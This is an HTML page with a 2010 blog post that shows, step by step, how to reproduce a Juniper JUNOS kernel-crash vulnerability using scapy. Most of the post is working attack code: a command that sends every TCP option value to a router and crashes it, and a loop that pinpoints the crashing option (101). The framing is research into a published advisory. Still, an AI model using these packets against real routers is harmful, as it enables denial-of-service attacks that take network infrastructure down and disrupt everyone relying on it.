<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-us">
<head>
  <link href="http://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

  <title>Juniper Kernel Crash - scapy Code &middot; Jeremy Rossi</title>

  
  <link rel="stylesheet" href="https://jeremyrossi.com/css/poole.css">
  <link rel="stylesheet" href="https://jeremyrossi.com/css/hyde.css">
  <link rel="stylesheet" href="https://jeremyrossi.com/css/poole-overrides.css">
  <link rel="stylesheet" href="https://jeremyrossi.com/css/hyde-overrides.css">
  <link rel="stylesheet" href="https://jeremyrossi.com/css/hyde-x.css">
  <link rel="stylesheet" href="https://jeremyrossi.com/css/highlight/sunburst.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Sans:400,400italic,700|Abril+Fatface">
  <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://jeremyrossi.com/touch-icon-144-precomposed.png">
  <link href="https://jeremyrossi.com/favicon.png" rel="icon">

  
  
  
  

  <meta name="description" content="Code Following the Juniper kernel flaw posts, we received a number of inquiries regarding how 
to determine the option value to use, however we were somewhat reluctant to provide 
that level of detail. Now that [exploit code has been published](http://evilrouters.net/2010/01/09/junos-psn-2010-01-623-exploit/) 
elsewhere, there is little reason not to answer this question.
">
  <meta name="keywords" content="your,default,page,keywords">
  
</head>
<body>
<div class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      
         
      <a href="/"><img src="https://www.gravatar.com/avatar/b951587bdce7fa14e7f213ee6b2ed7aa?s=200"
                       alt="gravatar" title="Jeremy Rossi"></a>
      
      <h1><a href="/">Jeremy Rossi</a></h1>
      <p class="lead">haphazard writing, but just might work</p>
    </div>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item"><a href="https://jeremyrossi.com/">Blog posts</a></li>
      
      <li class="sidebar-nav-item"><a href="https://jeremyrossi.com/about/">About Me</a></li>
      
    </ul>

    <ul class="sidebar-nav">
      <li class="sidebar-nav-item">
      <a href="https://github.com/jrossi"><i class="fa fa-github-square fa-3x"></i></a>
      
      
      <a href="https://www.linkedin.com/in/rossij"><i class="fa fa-linkedin-square fa-3x"></i></a>
      
      
      <a href="https://twitter.com/jrossi"><i class="fa fa-twitter-square fa-3x"></i></a>
      
      
      </li>
    </ul>

    

    <p>Copyright &copy; 2016 <a href="https://jeremyrossi.com/license/">License</a><br/>
       Powered by <a href="http://gohugo.io">Hugo</a> and <a href="https://github.com/zyro/hyde-x">Hyde-X</a></p>
  </div>
</div>


<div class="content container">
  <div class="post">
    <h1>Juniper Kernel Crash - scapy Code</h1>
    <span class="post-date">Jan 10, 2010 &middot; 2 minute read
    
    <br/>
    <a class="label" href="https://jeremyrossi.com/categories/security">security</a><a class="label" href="https://jeremyrossi.com/categories/networking">networking</a><a class="label" href="https://jeremyrossi.com/categories/programming">programming</a>
    </span>
    <p>On January 6th, we wrote about <a href="http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/">a JUNOS flaw</a>
that caused a kernel crash in Juniper routers and demonstrated
the <a href="http://praetorianprefect.com/archives/2010/01/junos-juniper-kernel-crash-video/">effect in action</a>
in a video. At the time Juniper was not making details of the advisory public, however since
then <a href="http://osvdb.org/ref/61/juniper-PSN-2010-01-623.txt">PSN-2010-01-623</a> has shown up on
the Open Source Vulnerability Database under entry <a href="http://osvdb.org/61538">61538</a>.</p>

<p>Following the Juniper kernel flaw posts, we received a number of inquiries regarding how
to determine the option value to use, however we were somewhat reluctant to provide
that level of detail. Now that <a href="http://evilrouters.net/2010/01/09/junos-psn-2010-01-623-exploit/">exploit code has been published</a>
elsewhere, there is little reason not to answer this question.</p>

<p>To test all possible TCP options using <a href="http://www.secdev.org/projects/scapy/">scapy</a>
(a python based packet manipulation program), first download the latest copy of
scapy (including all library dependencies) from their
<a href="http://hg.secdev.org/scapy/">Mercurial code repository</a> as shown below:</p>

<pre><code class="language-python">$ hg clone http://hg.secdev.org/scapy/
$ cd scapy
$ python setup build
$ sudo python setup install
</code></pre>

<p>Start scapy as root:</p>

<pre><code class="language-python">$ sudo run_scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.1.0-dev)
&gt;&gt;&gt;
</code></pre>

<p>We started this particular test by first creating an IP packet with a destination of the Juniper test router instance named &lsquo;ipl&rsquo;.</p>

<pre><code class="language-python">&gt;&gt;&gt; ipl = IP(dst=&quot;172.17.20.102&quot;)
&gt;&gt;&gt; ipl
</code></pre>

<p>Initially we tested all TCP options as fast as possible just to see if it was possible to reproduce the
reported vulnerability (a kernel crash that causes the router to reboot).</p>

<pre><code class="language-python">&gt;&gt;&gt; send([ipl/TCP(dport=23, options=[(x, &quot;&quot;)])/&quot;bye bye&quot; for x in range(256)])
................................................................................................................
................................................................................................................
................................
Sent 256 packets.
</code></pre>

<p>The previous command created 255 packets with every possible TCP option, sent them all
at once, and the router crashed. While this performed as expected, it only told us
that we were on the right track (the advisory was correct, an option setting
crashes the router), however it does not tell us which option.</p>

<p>The scapy tool can send a ping following each test packet to see if the router
is still up and responding, as demonstrated:</p>

<pre><code class="language-python">&gt;&gt;&gt; for x in range(255):
...   send(ipl/TCP(dport=&quot;22&quot;, options=[(x,&quot;&quot;)])
...   if not sr1(/ICMP(), retry=-1, timeout=1, verbose=0):
...     print &quot;we have a winner: %s&quot;%(x)
...     break
...
we have a winner: 101
</code></pre>

<p>Now that we have a winner, we know which option value caused the kernel crash
Juniper reported.</p>

  </div>
  
</div>




<script src="https://jeremyrossi.com/js/highlight.pack.js"></script>
<script>hljs.initHighlightingOnLoad();</script>

</body>
</html>

